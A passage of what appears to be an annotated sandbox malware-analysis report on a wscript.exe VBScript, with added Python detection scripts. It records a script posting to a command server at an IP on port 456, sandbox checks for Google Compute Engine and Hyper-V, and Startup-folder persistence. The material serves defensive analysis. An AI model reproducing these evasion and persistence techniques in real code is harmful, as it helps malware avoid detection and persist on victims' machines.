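CALL_RE = re.compile(r'([A-Za-z_]\w*)\.([A-Za-z_]\w*)\(((?:"[^"]*"|[^"()])*)\)')
STRING_RE = re.compile(r'"([^"]*)"')
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
DEFAULT_PORTS = {"http": 80, "https": 443}
STARTUP_MARK = "\\Start Menu\\Programs\\Startup\\"


def parse_calls(trace):
    """Return (interface, method, [quoted string args]) for every call in the trace."""
    return [(iface, meth, STRING_RE.findall(args))
            for iface, meth, args in CALL_RE.findall(trace)]


def analyze(trace):
    findings = {"requests": [], "wmi_queries": [], "user_agent": None, "persistence": None}
    copied_to = None   # destination of the last IFileSystem3.CopyFile
    shortcut = None    # .lnk currently being built via IWshShell3.CreateShortcut
    for iface, meth, args in parse_calls(trace):
        if iface == "IServerXMLHTTPRequest2" and meth == "open" and len(args) >= 2:
            url = urlparse(args[1])
            port = url.port or DEFAULT_PORTS.get(url.scheme)
            findings["requests"].append({
                "verb": args[0], "host": url.hostname, "port": port,
                "nonstandard_port": port != DEFAULT_PORTS.get(url.scheme),
                "ip_literal": bool(IPV4_RE.fullmatch(url.hostname or "")),
            })
        elif iface == "IServerXMLHTTPRequest2" and meth == "setRequestHeader" \
                and len(args) == 2 and args[0] == "User-Agent":
            findings["user_agent"] = args[1]
        elif meth == "ExecQuery" and args:
            findings["wmi_queries"].append(args[0])   # first arg is the WQL text
        elif iface == "IFileSystem3" and meth == "CopyFile" and len(args) == 2:
            copied_to = args[1]
        elif iface == "IWshShell3" and meth == "CreateShortcut" and args:
            shortcut = {"lnk": args[0], "target": None}
        elif iface == "IWshShortcut" and meth == "TargetPath" and shortcut and args:
            shortcut["target"] = args[0]
        elif iface == "IWshShortcut" and meth == "Save" and shortcut and shortcut["target"]:
            findings["persistence"] = {
                "lnk": shortcut["lnk"], "target": shortcut["target"],
                "in_startup": STARTUP_MARK in shortcut["lnk"],
                # Startup .lnk whose target is the file the script just copied itself to
                "targets_self_copy": copied_to is not None
                                     and shortcut["target"].lower() == copied_to.lower(),
            }
            shortcut = None
    return findings


def report(findings):
    """One human-readable line per finding."""
    lines = []
    for r in findings["requests"]:
        flags = [name for name, on in (("non-standard port", r["nonstandard_port"]),
                                       ("IP literal", r["ip_literal"])) if on]
        lines.append(f'{r["verb"]} {r["host"]}:{r["port"]}'
                     + (f' [{", ".join(flags)}]' if flags else ""))
    if findings["user_agent"]:
        lines.append(f'custom User-Agent {findings["user_agent"]!r}')
    for q in findings["wmi_queries"]:
        lines.append(f"WMI {q}")
    p = findings["persistence"]
    if p and p["in_startup"]:
        lines.append(f'Startup shortcut {p["lnk"]} -> {p["target"]}'
                     + (" (the script's own copy)" if p["targets_self_copy"] else ""))
    return lines


if __name__ == "__main__":
    print("\n".join(report(analyze(SAMPLE_TRACE))))
```

Run against the full trace on this page the same calls repeat, so the requests list simply grows; the persistence finding is the same for both wscript.exe instances because the second run copies nothing (the file already exists) and the Startup shortcut is rewritten with the same target.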

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic between 16 client ports (49706, 49709, 49716, 49717, 49719-49730) and server port 456, logged in both directions; 456 is the port of the POST to http://185.244.29.74:456/document in the AMSI trace and of the 185.244.29.74 Network Connect entry below
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (observed four times)
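The traffic entries above are sixteen client/server port pairs, one client port each, and the report's signatures for them ("Uses known network protocols on non-standard ports", "Script Initiated Connection to Non-Local Network") are one-line rules over such records. The script below is an added example, not part of the report: it collapses the per-direction flow lines into sessions keyed by the dynamic client port and applies those two rules to Network Connect lines of the kind listed under HIPS / PFW evasion. SAMPLE_LINES is constructed in the report's own line format from entries on this page plus one svchost.exe line to a private address as a negative control; the SCRIPT_HOSTS list and the WEB_PORTS set are the example's own assumptions, not values from the report.

```python
"""Collapse Joe Sandbox network lines into sessions and apply two rule ideas from
the report: HTTP on a non-standard port, and a script host talking to a non-local
address. Added example, not part of the report; SAMPLE_LINES is constructed."""
import ipaddress
import re
from collections import Counter

SAMPLE_LINES = """
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 456
Source: C:\\Windows\\System32\\wscript.exe Network Connect: 34.117.59.81 443
Source: C:\\Windows\\System32\\wscript.exe Network Connect: 185.244.29.74 456
Source: C:\\Windows\\System32\\svchost.exe Network Connect: 10.0.0.5 80
"""
# The svchost.exe line is a constructed control: not a script host, private address.

FLOW_RE = re.compile(r"Network traffic detected: (\w+) traffic on port (\d+) -> (\d+)")
CONNECT_RE = re.compile(r"Source: (\S+) Network Connect: (\d{1,3}(?:\.\d{1,3}){3}) (\d+)")
DYNAMIC = range(49152, 65536)                      # Windows client-port range
WEB_PORTS = {80, 443, 8080, 8443}                  # assumption: "standard" web ports
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}  # assumption


def sessions(text):
    """Count sessions per (proto, server port); one session per client port.
    Whichever end is outside the dynamic range is taken as the server port, so the
    two directions of one connection fold into a single session."""
    by_client = {}
    for proto, a, b in FLOW_RE.findall(text):
        a, b = int(a), int(b)
        client, server = (a, b) if a in DYNAMIC and b not in DYNAMIC else (b, a)
        by_client[(proto, client)] = server
    return Counter((proto, server) for (proto, _c), server in by_client.items())


def connections(text):
    """Classify each 'Network Connect' line by process type, address scope and port."""
    out = []
    for proc, ip, port in CONNECT_RE.findall(text):
        exe = proc.rsplit("\\", 1)[-1].lower()
        out.append({
            "process": exe, "ip": ip, "port": int(port),
            "script_host": exe in SCRIPT_HOSTS,
            "non_local": ipaddress.ip_address(ip).is_global,   # excludes RFC1918, loopback, link-local
            "nonstandard_port": int(port) not in WEB_PORTS,
        })
    return out


def alerts(text):
    found = []
    for (proto, port), n in sorted(sessions(text).items()):
        if proto == "HTTP" and port not in WEB_PORTS:
            found.append(f"{proto} on non-standard port {port} ({n} sessions)")
    for c in connections(text):
        if c["script_host"] and c["non_local"]:
            found.append(f'{c["process"]} -> {c["ip"]}:{c["port"]} '
                         "script-initiated connection to non-local network"
                         + (" on non-standard port" if c["nonstandard_port"] else ""))
    return found


if __name__ == "__main__":
    print("\n".join(alerts(SAMPLE_LINES)))
```

The dynamic-range heuristic is what lets a single client-to-server line (49716 -> 456 above, with no reply logged) still count as one session rather than a stray port; on the full page it yields sixteen sessions to port 456.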

Malware Analysis System Evasion

Source: Initial file: If objItem.Model = "Google Compute Engine" Then
Source: C:\Windows\System32\wscript.exe Dropped file: If objItem.Model = "Google Compute Engine" Then (same check in the %TEMP% copy; Model is a property of Win32_ComputerSystem, so objItem comes from the query below, not from Win32_LogicalDisk)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:' (issued by both wscript.exe instances)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer (both instances)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem (both instances)
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnq
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCFA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP@

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Network Connect: 34.117.59.81 443 (the only HTTPS URLs in the AMSI trace are https://ipinfo.io/country and https://ipinfo.io/org)
Source: C:\Windows\System32\wscript.exe Network Connect: 185.244.29.74 456 (plain-HTTP POST to /document with User-Agent B81A4609, per the AMSI trace)
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid